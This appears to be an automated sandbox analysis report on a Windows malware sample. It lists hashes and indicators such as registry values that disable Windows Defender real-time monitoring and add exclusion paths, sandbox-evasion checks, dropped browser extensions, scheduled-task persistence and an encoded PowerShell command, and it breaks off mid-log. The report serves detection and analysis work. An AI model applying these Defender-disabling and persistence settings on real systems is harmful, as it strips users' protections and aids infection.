Analysis
-
max time kernel
121s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20231020-en -
resource tags
arch:x64 arch:x86 image:win7-20231020-en locale:en-us os:windows7-x64 system -
submitted
25/11/2023, 18:38
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20231020-en
General
-
Target
file.exe
-
Size
7.2MB
-
MD5
13c54df3790dbde46fbe989793e21ce7
-
SHA1
ed331ca706aa52e6ddee7af22da490cc001749bc
-
SHA256
2cc26a714371577628a15d4b25ea23af43995d7d20b2a3fd891db403915e5e69
-
SHA512
e4904f745e3c06c834fcb98014fcb3054721a30b2d246047c0b4db1108cb58bb873cf398ab14a4777d2c69037b676238c7aa2f0660c6459dcfef6ad7f3f1c8c3
-
SSDEEP
196608:91OMVkbPbPFUEBQXzM14+H22JZu9c7eSL2r5bbk:3OMV0jPOECDMK+W2TXLO5k
Malware Config
Signatures
- Modifies Windows Defender Real-time Protection settings
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\jxiGQpNjugTNMjfxWSR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\tZRuTBnWsrIvjiMS = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\tZRuTBnWsrIvjiMS = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\jxiGQpNjugTNMjfxWSR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\sExqNpidIxpuC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\XfLIShEvOXUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\bNpaxMIFBfOU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths 
reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\rXjduNqsU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\UcpCEAFeKxUwNazky = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\tZRuTBnWsrIvjiMS = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\XfLIShEvOXUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\bNpaxMIFBfOU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\mIZkPWOoOJyyBkVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows 
Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\UcpCEAFeKxUwNazky = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\tZRuTBnWsrIvjiMS = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\rXjduNqsU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\sExqNpidIxpuC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\mIZkPWOoOJyyBkVB = "0" reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 24 2012 rundll32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments; here both Install.exe and rundll32.exe query SystemBiosVersion.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up the country code configured in the registry (Control Panel\International\Geo\Nation), likely a geofencing check.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Control Panel\International\Geo\Nation yNgrYVo.exe -
Executes dropped EXE 4 IoCs
pid Process 2632 Install.exe 2232 Install.exe 1712 VUHPWtm.exe 1928 yNgrYVo.exe -
Loads dropped DLL 12 IoCs
pid Process 2468 file.exe 2632 Install.exe 2632 Install.exe 2632 Install.exe 2632 Install.exe 2232 Install.exe 2232 Install.exe 2232 Install.exe 2012 rundll32.exe 2012 rundll32.exe 2012 rundll32.exe 2012 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials, cookies and session tokens.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json yNgrYVo.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json yNgrYVo.exe -
Drops file in System32 directory 21 IoCs
description ioc Process File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol VUHPWtm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat yNgrYVo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA yNgrYVo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_5B1817C873771E7928FB0BB0A329932B yNgrYVo.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_FB07F06F91B9FC3861EF6AA1C17C17C7 yNgrYVo.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol yNgrYVo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_5B1817C873771E7928FB0BB0A329932B yNgrYVo.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA yNgrYVo.exe File opened for modification 
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA yNgrYVo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_FB07F06F91B9FC3861EF6AA1C17C17C7 yNgrYVo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_8FF5BE4204C5F704E3914BEF4952C317 yNgrYVo.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol VUHPWtm.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini VUHPWtm.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA yNgrYVo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_8FF5BE4204C5F704E3914BEF4952C317 yNgrYVo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File created C:\Program Files (x86)\sExqNpidIxpuC\xwhNbHR.dll yNgrYVo.exe File created C:\Program Files (x86)\sExqNpidIxpuC\mShNRbs.xml yNgrYVo.exe File created C:\Program Files (x86)\bNpaxMIFBfOU2\jFQhRMSRjzDSn.dll yNgrYVo.exe File created C:\Program Files (x86)\bNpaxMIFBfOU2\zTkcCtK.xml yNgrYVo.exe File created C:\Program Files (x86)\jxiGQpNjugTNMjfxWSR\xyGwHVv.dll yNgrYVo.exe File created C:\Program Files (x86)\jxiGQpNjugTNMjfxWSR\JYSyzHW.xml yNgrYVo.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi yNgrYVo.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi yNgrYVo.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak yNgrYVo.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja yNgrYVo.exe File created C:\Program Files (x86)\rXjduNqsU\YRmTlyd.xml yNgrYVo.exe File created C:\Program Files (x86)\rXjduNqsU\FhMRzS.dll yNgrYVo.exe File created C:\Program Files (x86)\XfLIShEvOXUn\tfjJKET.dll yNgrYVo.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bbPqNtaaeFeEtSKaKR.job schtasks.exe File created C:\Windows\Tasks\GVFFxSkoOBQmaesjx.job schtasks.exe File created C:\Windows\Tasks\ydgLTpiJkJvZaMG.job schtasks.exe File created C:\Windows\Tasks\jFAecgscnrJhBwrRF.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution. In this run, the short-lived "Admin" tasks execute an encoded PowerShell command that decodes (UTF-16LE base64) to `start-process -WindowStyle Hidden gpupdate.exe /force`, which applies the dropped Group Policy file (C:\Windows\system32\GroupPolicy\Machine\Registry.pol); the task created with /RU "SYSTEM" launches the dropped VUHPWtm.exe.
pid Process 1744 schtasks.exe 936 schtasks.exe 1908 schtasks.exe 964 schtasks.exe 276 schtasks.exe 2680 schtasks.exe 2368 schtasks.exe 2548 schtasks.exe 2484 schtasks.exe 3012 schtasks.exe 3056 schtasks.exe 2160 schtasks.exe 3068 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates yNgrYVo.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8a-b2-3d-14-6d-97\WpadDecisionTime = 00a76dcbce1fda01 yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs yNgrYVo.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" yNgrYVo.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8a-b2-3d-14-6d-97\WpadDecisionReason = "1" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings yNgrYVo.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad yNgrYVo.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Set value (data) 
\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9977155F-6871-4D0E-901D-FB9D7A679303}\WpadDecisionTime = 00a76dcbce1fda01 yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8a-b2-3d-14-6d-97 yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9977155F-6871-4D0E-901D-FB9D7A679303}\8a-b2-3d-14-6d-97 yNgrYVo.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root yNgrYVo.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9977155F-6871-4D0E-901D-FB9D7A679303} yNgrYVo.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9977155F-6871-4D0E-901D-FB9D7A679303}\WpadDecision 
= "0" yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9977155F-6871-4D0E-901D-FB9D7A679303}\8a-b2-3d-14-6d-97 rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f007c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 yNgrYVo.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8a-b2-3d-14-6d-97 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9977155F-6871-4D0E-901D-FB9D7A679303}\WpadNetworkName = "Network 2" yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates yNgrYVo.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8a-b2-3d-14-6d-97\WpadDetectedUrl rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs yNgrYVo.exe Key created 
\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs yNgrYVo.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8a-b2-3d-14-6d-97\WpadDecisionTime = 00a76dcbce1fda01 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet 
Settings\Wpad\{9977155F-6871-4D0E-901D-FB9D7A679303}\WpadDecisionReason = "1" yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs yNgrYVo.exe -
Suspicious behavior: EnumeratesProcesses 29 IoCs
pid Process 268 powershell.EXE 268 powershell.EXE 268 powershell.EXE 1992 powershell.EXE 1992 powershell.EXE 1992 powershell.EXE 3032 powershell.EXE 3032 powershell.EXE 3032 powershell.EXE 1648 powershell.EXE 1648 powershell.EXE 1648 powershell.EXE 1928 yNgrYVo.exe 1928 yNgrYVo.exe 1928 yNgrYVo.exe 1928 yNgrYVo.exe 1928 yNgrYVo.exe 1928 yNgrYVo.exe 1928 yNgrYVo.exe 1928 yNgrYVo.exe 1928 yNgrYVo.exe 1928 yNgrYVo.exe 1928 yNgrYVo.exe 1928 yNgrYVo.exe 1928 yNgrYVo.exe 1928 yNgrYVo.exe 1928 yNgrYVo.exe 1928 yNgrYVo.exe 1928 yNgrYVo.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 268 powershell.EXE Token: SeDebugPrivilege 1992 powershell.EXE Token: SeDebugPrivilege 3032 powershell.EXE Token: SeDebugPrivilege 1648 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2468 wrote to memory of 2632 2468 file.exe 28 PID 2468 wrote to memory of 2632 2468 file.exe 28 PID 2468 wrote to memory of 2632 2468 file.exe 28 PID 2468 wrote to memory of 2632 2468 file.exe 28 PID 2468 wrote to memory of 2632 2468 file.exe 28 PID 2468 wrote to memory of 2632 2468 file.exe 28 PID 2468 wrote to memory of 2632 2468 file.exe 28 PID 2632 wrote to memory of 2232 2632 Install.exe 29 PID 2632 wrote to memory of 2232 2632 Install.exe 29 PID 2632 wrote to memory of 2232 2632 Install.exe 29 PID 2632 wrote to memory of 2232 2632 Install.exe 29 PID 2632 wrote to memory of 2232 2632 Install.exe 29 PID 2632 wrote to memory of 2232 2632 Install.exe 29 PID 2632 wrote to memory of 2232 2632 Install.exe 29 PID 2232 wrote to memory of 2584 2232 Install.exe 31 PID 2232 wrote to memory of 2584 2232 Install.exe 31 PID 2232 wrote to memory of 2584 2232 Install.exe 31 PID 2232 wrote to memory of 2584 2232 Install.exe 31 PID 2232 wrote to memory of 2584 2232 Install.exe 31 PID 2232 wrote to memory of 2584 2232 Install.exe 31 PID 2232 wrote to memory of 2584 2232 Install.exe 31 PID 2232 wrote to memory of 2720 2232 Install.exe 33 PID 2232 wrote to memory of 2720 2232 Install.exe 33 PID 2232 wrote to memory of 2720 2232 Install.exe 33 PID 2232 wrote to memory of 2720 2232 Install.exe 33 PID 2232 wrote to memory of 2720 2232 Install.exe 33 PID 2232 wrote to memory of 2720 2232 Install.exe 33 PID 2232 wrote to memory of 2720 2232 Install.exe 33 PID 2584 wrote to memory of 2216 2584 forfiles.exe 35 PID 2584 wrote to memory of 2216 2584 forfiles.exe 35 PID 2584 wrote to memory of 2216 2584 forfiles.exe 35 PID 2584 wrote to memory of 2216 2584 forfiles.exe 35 PID 2584 wrote to memory of 2216 2584 forfiles.exe 35 PID 2584 wrote to memory of 2216 2584 forfiles.exe 35 PID 2584 wrote to memory of 2216 2584 forfiles.exe 35 PID 2720 wrote to memory of 2548 2720 forfiles.exe 36 PID 2720 wrote to memory of 2548 2720 forfiles.exe 36 PID 2720 
wrote to memory of 2548 2720 forfiles.exe 36 PID 2720 wrote to memory of 2548 2720 forfiles.exe 36 PID 2720 wrote to memory of 2548 2720 forfiles.exe 36 PID 2720 wrote to memory of 2548 2720 forfiles.exe 36 PID 2720 wrote to memory of 2548 2720 forfiles.exe 36 PID 2216 wrote to memory of 2544 2216 cmd.exe 37 PID 2216 wrote to memory of 2544 2216 cmd.exe 37 PID 2216 wrote to memory of 2544 2216 cmd.exe 37 PID 2216 wrote to memory of 2544 2216 cmd.exe 37 PID 2216 wrote to memory of 2544 2216 cmd.exe 37 PID 2216 wrote to memory of 2544 2216 cmd.exe 37 PID 2216 wrote to memory of 2544 2216 cmd.exe 37 PID 2548 wrote to memory of 2568 2548 cmd.exe 38 PID 2548 wrote to memory of 2568 2548 cmd.exe 38 PID 2548 wrote to memory of 2568 2548 cmd.exe 38 PID 2548 wrote to memory of 2568 2548 cmd.exe 38 PID 2548 wrote to memory of 2568 2548 cmd.exe 38 PID 2548 wrote to memory of 2568 2548 cmd.exe 38 PID 2548 wrote to memory of 2568 2548 cmd.exe 38 PID 2216 wrote to 